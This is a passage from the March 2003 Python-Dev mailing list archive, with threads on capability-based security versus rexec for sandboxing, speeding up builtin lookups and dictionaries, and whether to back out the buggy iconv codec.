from C code, so I don't understand what authority __init__() can
exercise.

> To pick one at random, consider zipfile.ZipFile.  At first glance it
> appears that once you create a ZipFile object with mode "r" you can
> hand it off to provide read-only access to a zip archive.  (Even if
> a security audit of the code reveals holes, my point is that the API
> isn't far from accommodating such a design intent.)

But is it really ZipFile.__init__ that exercises the authority?  Isn't
its authority derived from that of the open() function that it calls?

> It's useful to be able to separate the authority to read one
> particular instance of ZipFile from the authority to instantiate
> new ZipFiles, which currently allows you to open any zip file on
> the filesystem for reading or writing.

In what sense is the ZipFile class an entity by itself, rather than
just a pile of Python statements that derive any and all authority
from its caller?

I understand how class ZipFile could exercise authority in a
rexec-based world, if the zipfile module was trusted code.  But I
thought that a capability view of the world doesn't distinguish
between trusted and untrusted code.  I guess I need to understand
better what kind of "barriers" the capability way of life *does* use.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Mon Mar 31 00:34:16 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 31 Mar 2003 12:34:16 +1200 (NZST)
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281031.30093.aleax@aleax.it>
Message-ID: <200303310034.h2V0YG902190@oma.cosc.canterbury.ac.nz>

Alex Martelli <aleax@aleax.it>:

> It happens, though -- for code whose performance is not important,
> e.g. initialization and "resetting" kind of stuff, a PyRun_String can be
> SO much more concise and handier than meticulous expansion of
> basically the same things into tens of lines of C code...

Nowadays you can let Pyrex do the expansion for you...:-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 31 01:49:48 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 31 Mar 2003 13:49:48 +1200 (NZST)
Subject: [Python-Dev] Re: Fast access to __builtins__
In-Reply-To: <004b01c2f57e$7fb13700$bf11a044@oemcomputer>
Message-ID: <200303310149.h2V1nmM02378@oma.cosc.canterbury.ac.nz>

Raymond Hettinger <python@rcn.com>:

> * Scanning my own sources, it looks like some of the builtins
>    almost never appear inside loops (dir, map, filter, zip, dict, range).
>    The ones that are in loops usually do something simple (int, str,
>    chr, len).  Either way, builtin access never seems to dominate
>    the running time.  OTOH, maybe that's just the way I write code.

That's probably true in the large. However, sometimes one has a tight
little loop that makes lots of calls to a builtin. I've occasionally
improved the speed of something noticeably using the
copy-a-builtin-to-a-local trick.
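
A minimal sketch of the trick, assuming Python 3 (the function names
are made up). Binding the builtin as a default argument turns the
lookup inside the loop into a local variable access. How much this
saves depends on the interpreter version, so it is worth timing before
relying on it.

```python
def total_length_global(words):
    total = 0
    for w in words:
        total += len(w)     # `len` is looked up in globals, then builtins
    return total

def total_length_local(words, len=len):
    # The default argument binds the builtin once, at definition time;
    # inside the loop `len` is then a local variable.
    total = 0
    for w in words:
        total += len(w)
    return total

words = ["spam", "eggs", "ham"] * 1000
same = total_length_global(words) == total_length_local(words)
```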

Maybe for these cases there could be a "builtin" declaration, like
"global" but declaring that something is to be found in the builtin
scope?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 31 02:14:16 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 31 Mar 2003 14:14:16 +1200 (NZST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
Message-ID: <200303310214.h2V2EGW02500@oma.cosc.canterbury.ac.nz>

Ka-Ping Yee <ping@zesty.ca>:

> On Sun, 30 Mar 2003, Guido van Rossum wrote:
> > [Ping]
> > > Having access to a particular instance should certainly not allow
> > > one to ask it for its class, and then instantiate the class with
> > > arbitrary constructor arguments.
> >
> > Assuming the Python code in the class itself is not empowered in any
> > special way, I don't see why not.  So that suggests that you assume
> > classes can be empowered.  I can see this for classes implemented in
> > C; but how can classes implemented in pure Python be empowered?
> 
> In many classes, __init__ exercises authority.  An obvious C type with
> the same problem is the "file" type

Yes, I think the solution to this is not to forbid getting
hold of the class of an object, but to design constructors
so that they don't do anything that might be a security
problem.

In the case of files, that would mean removing the feature
that file("foo") means the same as open("foo"), so that
only the open() function can open arbitrary files.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From python@rcn.com  Mon Mar 31 03:27:07 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 30 Mar 2003 22:27:07 -0500
Subject: [Python-Dev] Re: Fast access to __builtins__
References: <200303310149.h2V1nmM02378@oma.cosc.canterbury.ac.nz>
Message-ID: <006401c2f735$68b64be0$4010a044@oemcomputer>

> Raymond Hettinger <python@rcn.com>:
> > * Scanning my own sources, it looks like some of the builtins
> >    almost never appear inside loops (dir, map, filter, zip, dict, range).
> >    The ones that are in loops usually do something simple (int, str,
> >    chr, len).  Either way, builtin access never seems to dominate
> >    the running time.  OTOH, maybe that's just the way I write code.
> 
[Greg Ewing]
> That's probably true in the large. However, sometimes one has a tight
> little loop that makes lots of calls to a builtin. I've occasionally
> improved the speed of something noticeably using the
> copy-a-builtin-to-a-local trick.

It will have to wait until Py2.4 and the issue will likely be subsumed by 
more sophisticated approaches that optimize all namespace access.  
Jeremy's DList technique looks especially promising.  Similarly, I'm
experimenting with a dict subclass that keeps its values in lists of
length one and can return the container for clients interested in fast
get or set access to the value associated with a given key.
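
One way such a dict subclass might look; this is a guess at the idea,
not the actual experiment, and assumes Python 3. CellDict and getcell
are made-up names, and only item get/set are covered (get(), items(),
update() and the constructor would need the same treatment).

```python
class CellDict(dict):
    """dict that stores each value in a one-element list (a "cell")."""

    def __setitem__(self, key, value):
        try:
            # Reuse the existing cell so earlier holders see the update.
            dict.__getitem__(self, key)[0] = value
        except KeyError:
            dict.__setitem__(self, key, [value])

    def __getitem__(self, key):
        return dict.__getitem__(self, key)[0]

    def getcell(self, key):
        """Return the container itself for fast repeated get/set."""
        return dict.__getitem__(self, key)

d = CellDict()
d["x"] = 1
cell = d.getcell("x")   # one dictionary lookup, done up front
d["x"] = 2              # visible through the cell without a new lookup
seen_via_cell = cell[0]
cell[0] = 3             # and writes through the cell reach the dict
seen_via_dict = d["x"]
```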

Also, I've been working on a faster design for dictionaries that increases
overall sparseness (meaning fewer collisions) while increasing the density
of entries that fit in a single cache line (reducing the cost of a miss).  
Increasing density involves splitting the arrays of PyDictEntry into separate 
arrays of hashes, keys, and values.  Further, the entries are clustered into 
groups of up to 16 hash values that can fit in a single cache line.  This also
allows for a much tighter inner loop for the lookup function.


Raymond Hettinger


From mal@lemburg.com  Mon Mar 31 07:42:50 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 31 Mar 2003 09:42:50 +0200
Subject: [Python-Dev] iconv codec
Message-ID: <3E87F17A.3080602@lemburg.com>

Since the introduction of the iconv codec there have been numerous
bug reports related to the codec and the lack of cross platform
support for it (ranging from: the codec doesn't compile and the
codec doesn't support standard names for common encodings to
core dumps in the linking phase).

I'd like to question whether the codec is really ready for prime
time yet. Right now it causes people more trouble than it does
any good.

Some examples:
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=675341
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=690309
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=712056
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=694431

The problem doesn't seem to be related to the code implementation
itself, but rather the varying quality of iconv implementations
out there.

OTOH, without some field testing the codec will never get into
shape for prime time, so perhaps it would be better to only
enable it via a configure option or make a failure to compile
the codec as painless as possible.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 31 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      1 days left
EuroPython 2003, Charleroi, Belgium:                        85 days left


From perky@fallin.lv  Mon Mar 31 08:04:17 2003
From: perky@fallin.lv (Hye-Shik Chang)
Date: Mon, 31 Mar 2003 17:04:17 +0900
Subject: [Python-Dev] iconv codec
In-Reply-To: <3E87F17A.3080602@lemburg.com>
References: <3E87F17A.3080602@lemburg.com>
Message-ID: <20030331080417.GA52581@fallin.lv>

On Mon, Mar 31, 2003 at 09:42:50AM +0200, M.-A. Lemburg wrote:
> Since the introduction of the iconv codec there have been numerous
> bug reports related to the codec and the lack of cross platform
> support for it (ranging from: the codec doesn't compile and the
> codec doesn't support standard names for common encodings to
> core dumps in the linking phase).
> 
> I'd like to question whether the codec is really ready for prime
> time yet. Right now it causes people more trouble than it does
> any good.

iconv_codec NG is ready to submit to SF. I think the newer
implementation can resolve many of the patch reports. I'll submit
it in a few days. If you have time, you can review my patches
before my submission. The patch includes ko, zh_CN, zh_TW codecs, also.

A note about other problems with the current iconv_codec:
http://fallin.lv/cvs/~checkout~/py-multibytecodec/reports/iconv.1

The multibytecodecs that are in my patch submission queue:
http://fallin.lv/distfiles/py-multibytecodec-030331.tar.gz

> OTOH, without some field testing the codec will never get into
> shape for prime time, so perhaps it would be better to only
> enable it via a configure option or make a failure to compile
> the codec as painless as possible.

I agree.


    Hye-Shik =)


From mal@lemburg.com  Mon Mar 31 09:38:02 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 31 Mar 2003 11:38:02 +0200
Subject: [Python-Dev] iconv codec
In-Reply-To: <20030331080417.GA52581@fallin.lv>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
Message-ID: <3E880C7A.4060405@lemburg.com>

Hye-Shik Chang wrote:
> On Mon, Mar 31, 2003 at 09:42:50AM +0200, M.-A. Lemburg wrote:
> 
>>Since the introduction of the iconv codec there have been numerous
>>bug reports related to the codec and the lack of cross platform
>>support for it (ranging from: the codec doesn't compile and the
>>codec doesn't support standard names for common encodings to
>>core dumps in the linking phase).
>>
>>I'd like to question whether the codec is really ready for prime
>>time yet. Right now it causes people more trouble than it does
>>any good.
> 
> iconv_codec NG is ready to submit to SF. I think the newer
> implementation can resolve many of the patch reports. 

Are you sure ? As I mentioned in my mail, most problems
seem to be related to the platform's iconv implementation,
not so much to the Python one.

> I'll submit
> it in a few days. If you have time, you can review my patches
> before my submission. 

Sorry, no time for that. I'm heading off to Python UK today.

> The patch includes ko, zh_CN, zh_TW codecs, also.
> 
> A note about other problems with the current iconv_codec:
> http://fallin.lv/cvs/~checkout~/py-multibytecodec/reports/iconv.1
> 
> The multibytecodecs that are in my patch submission queue:
> http://fallin.lv/distfiles/py-multibytecodec-030331.tar.gz
> 
>>OTOH, without some field testing the codec will never get into
>>shape for prime time, so perhaps it would be better to only
>>enable it via a configure option or make a failure to compile
>>the codec as painless as possible.
> 
> I agree.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 31 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     one day left
EuroPython 2003, Charleroi, Belgium:                        85 days left


From guido@python.org  Mon Mar 31 12:21:04 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 07:21:04 -0500
Subject: [Python-Dev] iconv codec
In-Reply-To: "Your message of Mon, 31 Mar 2003 17:04:17 +0900."
 <20030331080417.GA52581@fallin.lv>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
Message-ID: <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>

> iconv_codec NG is ready to submit to SF.

Assuming the NG label means this is a completely new implementation, I
propose we drop the current iconv implementation immediately and
consider the NG version as we would consider any newly contributed
module at this point in time (i.e. at most two weeks before the first
beta of 2.3 is released).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From zooko@zooko.com  Mon Mar 31 17:51:03 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 31 Mar 2003 12:51:03 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Sun, 30 Mar 2003 19:09:52 EST." <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>  <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <E1903R1-0005sc-00@localhost>

 Guido wrote:
>
> I understand how class ZipFile could exercise authority in a
> rexec-based world, if the zipfile module was trusted code.  But I
> thought that a capability view of the world doesn't distinguish
> between trusted and untrusted code.  I guess I need to understand
> better what kind of "barriers" the capability way of life *does* use.

I think you are on track with regard to the deeper question you are grappling 
with.  Almost all dangerous things come ultimately from C code.  (I can think of 
one danger that can come from pure Python code: it can provide an illicit 
communications channel between other objects.)

So in the "separate policy language" way of life, access to the ZipFile class 
gives you the ability to open files anywhere in the filesystem.  The ZipFile 
class therefore has the "dangerous" flag set, and when you run code that you 
think might misuse this feature, you set the "can't use dangerous things" flag 
on that code.

In the capability way of life, it is still the case that access to the ZipFile 
class gives you the ability to open files anywhere in the system!  (That is: I'm 
assuming for now that we implement capabilities without re-writing every 
dangerous class in the Library.)  In this scheme, there are no flags, and when 
you run code that you think might misuse this feature, you simply don't give 
that code a reference to the ZipFile class.  (Also, we have to arrange that it 
can't acquire a reference by "import zipfile".)

So far the two approaches have the same effect, and the difference, for better 
or for worse, is that the policy of "this code can't use ZipFile" is encoded in 
Python reference-management code in the latter and encoded in a pair of flags in 
the former.

Now, we might want to allow certain code to use something else dangerous (such 
as the socket module) while simultaneously disallowing it from using ZipFile.  
As we add N more dangerous modules, and M more objects of untrusted code that we 
want to control, we have an N*M access control matrix to configure which code 
can use which modules.  (In an access control matrix, rows are "subjects" -- 
things that can exercise authority -- and columns are "resources" -- things that 
might require authority when used.)
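
A minimal sketch of such a matrix, to make the N*M growth concrete.  The
subject and resource names below are hypothetical and exist only for
illustration; nothing like this table is part of rexec or of any proposed
capability system.

```python
# Hypothetical subjects (pieces of untrusted code) and resources
# (dangerous modules); the names are made up for this sketch.
subjects = ["caplet_a", "caplet_b", "caplet_c"]
resources = ["zipfile", "socket", "os"]

# The matrix holds one explicit allow/deny decision per (subject, resource).
matrix = {(s, r): False for s in subjects for r in resources}
matrix[("caplet_a", "socket")] = True   # caplet_a may use sockets only
matrix[("caplet_b", "zipfile")] = True  # caplet_b may use ZipFile only


def allowed(subject, resource):
    """Look up a decision; pairs missing from the matrix are denied."""
    return matrix.get((subject, resource), False)


# M subjects times N resources gives M*N cells to configure and keep correct.
cell_count = len(matrix)
```

Every new subject adds a full row and every new resource a full column, and
each cell is a separate decision that somebody has to get right.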

In a system where designation is not unified with authority, you tell this 
untrusted code "I want you to do this action X.", and then you also have to go 
update the policy specification to say that the code in question is allowed to 
do the action X.  This "say it twice if you really mean it" overhead puts a 
practical limit on how fine-grained your policies can be, and it adds a source 
of accidents that lead to security holes.

So now with a large or fine-grained access control matrix, we see the "unify 
designation and authority" maxim really shines, and really matches well with 
the Zen of Python.

But there is still another advantage that capabilities offer over other access 
control systems.  With normal access control (and an extremely diligent and 
patient programmer and user) you can in theory achieve the Principle of Least 
Privilege -- that the untrusted code runs with the minimal set of authorities 
necessary to do its job.  However, this is implemented by creating a new 
"principal" -- a new row in the access control matrix, setting the access 
control bits in each element of that row, and preventing any other code from 
setting the bits in that row.

Now, observe that only maximally trusted code -- with "root" authority -- is 
allowed to make these kinds of updates to the access control matrix.  This means 
that all code is divided into two kinds: the kind that can impose 
Least-Privilege on code that it invokes (this code has root authority), and the 
kind that can be constrained by Least-Privilege when it is invoked (this code 
doesn't).

With capabilities there is no such distinction.  All code can be constrained to 
have access to only the privileges that it requires, and at the same time all 
code can constrain other code that it invokes.

This feature, which I call "Higher-Order Principle of Least Privilege" [*] 
enables new applications.

For example, using first-order Least-Privilege a web browser which runs 
cap-Python "caplets" could extend selective privileges to the caplets, such as 
permission to read a certain file, while withholding others, such as permission 
to write to that file, or permission to send the contents of the file to a 
remote computer.

In addition, if cap-Python supports Higher-Order Least-Privilege, those caplets 
could themselves use other caplets ("web services"?) without unnecessarily 
exposing their privileges to those sub-caplets.
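
A rough sketch of a caplet narrowing its own privileges before calling a
sub-caplet.  The names ReadOnly, caplet and sub_caplet are hypothetical, and
plain Python does not enforce the restriction (the wrapped file is still
reachable through introspection, e.g. via the bound method's __self__), so
this shows only the shape of the idea, not a secure implementation.

```python
import io


class ReadOnly:
    """Wrap a file-like object and forward only read()."""

    def __init__(self, f):
        # Keep just the bound read method rather than the file itself.
        self._read = f.read

    def read(self, *args):
        return self._read(*args)


def sub_caplet(source):
    # The sub-caplet can only do what the object it was handed allows.
    return source.read().upper()


def caplet(f):
    # The caplet itself holds read and write access to f ...
    f.write("hello")
    f.seek(0)
    # ... but hands only the read half on to the code it invokes.
    return sub_caplet(ReadOnly(f))


result = caplet(io.StringIO())
```

The point is that caplet needed no special "root" status to constrain
sub_caplet; it only needed to hold the reference in the first place.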

One could imagine, for example, a web browser written in cap-Python, which runs 
inside the first web browser (e.g. Mozilla with a cap-Python plug-in), and uses 
cap-Python caplets to extend its (the cap-Python web browser's) functionality.  
If people already had the cap-Python plug-in installed in their local Mozilla, 
then simply visiting the "cap-python-browser.com" site would be sufficient to 
launch the cap-Python web browser.

Of course, this could lead straight to a fully functional desktop, making good 
on Marc Andreessen's old threat to turn the browser into the operating system and 
the operating system into the device driver.  

This would be effectively the "virtualization" of access control.  I regard it 
as a kind of holy Grail for internet computing.

Regards,

Zooko

[*]  I call it that because it is the application of the Principle of Least 
Privilege to the implementation of the Principle of Least Privilege.  One should 
be able to impose least-privilege constraints on the code one uses without 
requiring full root privileges oneself!

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Mon Mar 31 19:43:52 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 14:43:52 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 31 Mar 2003 12:51:03 EST."
 <E1903R1-0005sc-00@localhost>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org> <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
 <E1903R1-0005sc-00@localhost>
Message-ID: <200303311944.h2VJhsA16638@odiug.zope.com>

> Guido wrote:
> >
> > I understand how class ZipFile could exercise authority in a
> > rexec-based world, if the zipfile module was trusted code.  But I
> > thought that a capability view of the world doesn't distinguish
> > between trusted and untrusted code.  I guess I need to understand
> > better what kind of "barriers" the capability way of life *does* use.

[Zooko]
> I think you are on track with regard to the deeper question you are
> grappling with.  Almost all dangerous things come ultimately from C
> code.  (I can think of one danger that can come from pure Python
> code: it can provide an illicit communications channel between other
> objects.)
> 
> So in the "separate policy language" way of life, access to the
> ZipFile class gives you the ability to open files anywhere in the
> filesystem.  The ZipFile class therefore has the "dangerous" flag
> set, and when you run code that you think might misuse this feature,
> you set the "can't use dangerous things" flag on that code.

But that's not how rexec works.  In the rexec world, the zipfile
module has no special privileges; when it is imported by untrusted
code, it is reloaded from disk as if it were untrusted itself.  The
zipfile.ZipFile class is a client of "open", an implementation of
which is provided to the untrusted code by the trusted code.  This
implementation does access checking (according to a separate policy
language, indeed).  So importing Python modules is always safe for
untrusted code, because the imported Python code derives its authority
from whatever the untrusted user already has.  (It's different for C
extension modules of course.)

> In the capability way of life, it is still the case that access to
> the ZipFile class gives you the ability to open files anywhere in
> the system!  (That is: I'm assuming for now that we implement
> capabilities without re-writing every dangerous class in the
> Library.)  In this scheme, there are no flags, and when you run code
> that you think might misuse this feature, you simply don't give that
> code a reference to the ZipFile class.  (Also, we have to arrange
> that it can't acquire a reference by "import zipfile".)

The rexec world solves this very nicely IMO.  Can't the capability
world do it the same way?  The only difference might be that 'open'
would have to be a capability.

> So far the two approaches have the same effect, and the difference,
> for better or for worse, is that the policy of "this code can't use
> ZipFile" is encoded in Python reference-management code in the
> latter and encoded in a pair of flags in the former.

But I think "this code can't use ZipFile" is the wrong thing to say.
You should only have to say "this code can't write files" (or
something more specific).

> Now, we might want to allow certain code to use something else
> dangerous (such as the socket module) while simultaneously
> disallowing it from using ZipFile.  As we add N more dangerous
> modules, and M more objects of untrusted code that we want to
> control, we have an N*M access control matrix to configure which
> code can use which modules.  (In an access control matrix, rows are
> "subjects" -- things that can exercise authority and columns are
> "resources" -- things that might require authority when used.)

In the rexec world, modules and classes don't have separate privileges
-- the privileges are held by a larger concept, which we might call a
"workspace".  The rexec world allows many workspaces with different
privileges -- but no communication between them.

> In a system where designation is not unified with authority, you
> tell this untrusted code "I want you to do this action X.", and then
> you also have to go update the policy specification to say that the
> code in question is allowed to do the action X.

Sorry, you've lost me here.  Which part is the "designation" (new word
for me) and which part is the "authority"?

> This "say it twice if you really mean it" overhead puts a practical
> limit on how fine-grained your policies can be, and it adds a source
> of accidents that lead to security holes.
> 
> So now with a large or fine-grained access control matrix, we see
> the "unify designation and authority" maxim really shines, and
> really matches well with the Zen of Python.

Sorry, this is too abstract for me to see (yet).  You are sounding a
bit like a used-car salesman here, or "Proof by using Big Words". :-)

> But there is still another advantage that capabilities offer over
> other access control systems.  With normal access control (and an
> extremely diligent and patient programmer and user) you can in
> theory achieve the Principle of Least Privilege -- that the
> untrusted code runs with the minimal set of authorities necessary to
> do its job.  However, this is implemented by creating a new
> "principal" -- a new row in the access control matrix, setting the
> access control bits in each element of that row, and preventing any
> other code from setting the bits in that row.
> 
> Now, observe that only maximally trusted code -- with "root"
> authority -- is allowed to make these kinds of updates to the access
> control matrix.  This means that all code is divided into two kinds:
> the kind that can impose Least-Privilege on code that it invokes
> (this code has root authority), and the kind that can be constrained
> by Least-Privilege when it is invoked (this code doesn't).

In the rexec world, it is possible for a restricted workspace (at
least in theory -- the rexec module may not be directly usable but
something similar could) to create another workspace and selectively
pass privileges into that workspace.
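
A sketch of that idea in present-day Python, assuming a "workspace" is just a
namespace with its own __builtins__ table.  make_workspace and spawn are
hypothetical helpers invented for this example, not rexec functions, and a
bare exec namespace is not a real security boundary.

```python
def make_workspace(granted):
    """Return a namespace whose builtins are exactly `granted`, plus a
    spawn() helper that can pass on only a subset of them."""

    def spawn(names):
        missing = [n for n in names if n not in granted]
        if missing:
            raise PermissionError("cannot pass on: %s" % ", ".join(missing))
        return make_workspace({n: granted[n] for n in names})

    table = dict(granted)
    table["spawn"] = spawn
    return {"__builtins__": table}


# The outer workspace is granted len and sum, nothing else.
outer = make_workspace({"len": len, "sum": sum})

# Code running inside the outer workspace creates a narrower inner one.
exec("inner = spawn(['len'])", outer)
inner = outer["inner"]

# Code in the inner workspace can use len, but sum was not passed on.
exec("n = len('abc')", inner)
```

A workspace can pass on only names it was itself granted, so privileges can
shrink but never grow as workspaces nest.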

> With capabilities there is no such distinction.  All code can be
> constrained to have access to only the privileges that it requires,
> and at the same time all code can constrain other code that it
> invokes.
> 
> This feature, which I call "Higher-Order Principle of Least
> Privilege" [*] enables new applications.

Sorry, more "Big Words". :-)

> For example, using first-order Least-Privilege a web browser which
> runs cap-Python "caplets" could extend selective privileges to the
> caplets, such as permission to read a certain file, while
> withholding others, such as permission to write to that file, or
> permission to send the contents of the file to a remote computer.
> 
> In addition, if cap-Python supports Higher-Order Least-Privilege,
> those caplets could themselves use other caplets ("web services"?) 
> without unnecessarily exposing their privileges to those
> sub-caplets.

It really sounds to me like at least one of our fundamental (?)
differences is the autonomicity of code units.  I think of code (at
least Python code) as a passive set of instructions that has no
inherent authority but derives authority from the built-ins passed to
it; you seem to describe code as having inherent authority.

> One could imagine, for example, a web browser written in cap-Python,
> which runs inside the first web browser (e.g. Mozilla with a
> cap-Python plug-in), and uses cap-Python caplets to extend its (the
> cap-Python web browser's) functionality.  If people already had the
> cap-Python plug-in installed in their local Mozilla, then simply
> visiting the "cap-python-browser.com" site would be sufficient to
> launch the cap-Python web browser.
> 
> Of course, this could lead straight to a fully functional desktop,
> making good on Marc Andreessen's old threat to turn the browser into
> the operating system and the operating system into the device
> driver.
> 
> This would be effectively the "virtualization" of access control.  I
> regard it as a kind of holy Grail for internet computing.

How practical is this dream?  How useful?

> Regards,
> 
> Zooko
> 
> [*] I call it that because it is the application of the Principle of
> Least Privilege to the implementation of the Principle of Least
> Privilege.  One should be able to impose least-privilege constraints
> on the code one uses without requiring full root privileges oneself!
> 
> http://zooko.com/
>          ^-- under re-construction: some new stuff, some broken links

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Mon Mar 31 21:41:50 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 31 Mar 2003 23:41:50 +0200
Subject: [Python-Dev] iconv codec
In-Reply-To: <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
 <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> Assuming the NG label means this is a completely new implementation, I
> propose we drop the current iconv implementation immediately and
> consider the NG version as we would consider any newly contributed
> module at this point in time (i.e. at most two weeks before the first
> beta of 2.3 is released).

Ok. Given the reported problems with the iconv module, and the
prospect of getting a complete rewrite, I'll back out the current
code.

This is quite sad, IMO, as the code *is* useful for the platforms on
which it works, and this *is* the majority of the installations on
which it is currently built.

Regards,
Martin


From guido@python.org  Mon Mar 31 22:10:36 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 17:10:36 -0500
Subject: [Python-Dev] iconv codec
In-Reply-To: Your message of "31 Mar 2003 23:41:50 +0200."
 <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv> <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
 <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>
Message-ID: <200303312210.h2VMAba24516@odiug.zope.com>

> > Assuming the NG label means this is a completely new implementation, I
> > propose we drop the current iconv implementation immediately and
> > consider the NG version as we would consider any newly contributed
> > module at this point in time (i.e. at most two weeks before the first
> > beta of 2.3 is released).
> 
> Ok. Given the reported problems with the iconv module, and the
> prospect of getting a complete rewrite, I'll back out the current
> code.
> 
> This is quite sad, IMO, as the code *is* useful for the platforms on
> which it works, and this *is* the majority of the installations on
> which it is currently built.

But given that it's only got a small audience, a 3rd party module
would satisfy the need just as well, right?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From zooko@zooko.com  Mon Mar 31 22:22:41 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 31 Mar 2003 17:22:41 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Mon, 31 Mar 2003 14:43:52 EST." <200303311944.h2VJhsA16638@odiug.zope.com>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org> <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net> <E1903R1-0005sc-00@localhost>  <200303311944.h2VJhsA16638@odiug.zope.com>
Message-ID: <E1907fu-0007r9-00@localhost>

It's apparent that I didn't explain capabilities clearly enough.  Also 
I misunderstood something about rexec in general and ZipFile in particular.  
Once we succeed at understanding each other, I'll then inquire whether you agree 
with my Big Word Proofs.

(I, Zooko, wrote lines prepended with "> > ".)

 Guido wrote:
>
> > So in the "separate policy language" way of life, access to the
> > ZipFile class gives you the ability to open files anywhere in the
> > filesystem.  The ZipFile class therefore has the "dangerous" flag
> > set, and when you run code that you think might misuse this feature,
> > you set the "can't use dangerous things" flag on that code.
> 
> But that's not how rexec works.  In the rexec world, the zipfile
> module has no special privileges; when it is imported by untrusted
> code, it is reloaded from disk as if it were untrusted itself.  The
> zipfile.ZipFile class is a client of "open", an implementation of
> which is provided to the untrusted code by the trusted code.

<Zooko reads the zipfile module docs.>

How is the implementation of "open" provided by the trusted code to the 
untrusted code?  Is it possible to provide a different "open" implementation to 
different "instances" of the zipfile module?  (I think not, as there is no such 
thing as "a different instance of a module", but perhaps you could have two 
rexec "workspaces" each of which has a zipfile module with a different "open"?)

> > In this scheme, there are no flags, and when you run code
> > that you think might misuse this feature, you simply don't give that
> > code a reference to the ZipFile class.  (Also, we have to arrange
> > that it can't acquire a reference by "import zipfile".)
> 
> The rexec world solves this very nicely IMO.  Can't the capability
> world do it the same way?  The only difference might be that 'open'
> would have to be a capability.

I don't understand exactly how rexec works yet, but so far it sounds like 
capabilities.

Here's a two-sentence definition of capabilities:

Authority originates in C code (in the interpreter or C extension modules), and 
is passed from thing to thing.  A given thing "X" -- an instance of ZipFile, for 
example -- has the authority to use a given authority -- to invoke the real 
open(), for example -- if and only if some thing "Y" previously held both the 
"open()" authority and the "authority to extend authorities to X" authority, and 
chose to extend the "open()" authority to X.  

That rule could be enforced with the rexec system, right?

Here is a graphical representation of this rule.  (Taken from [1].)

http://www.erights.org/elib/capability/ode/images/fundamental.gif

In the diagram, the authority is "Carol", the thing that started with the 
authority is "Alice", and Alice is in the process of extending to Bob the 
authority to use Carol.  This act -- the extending of authority from Alice to 
Bob -- is the only way that Bob can gain authority, and it can only happen if 
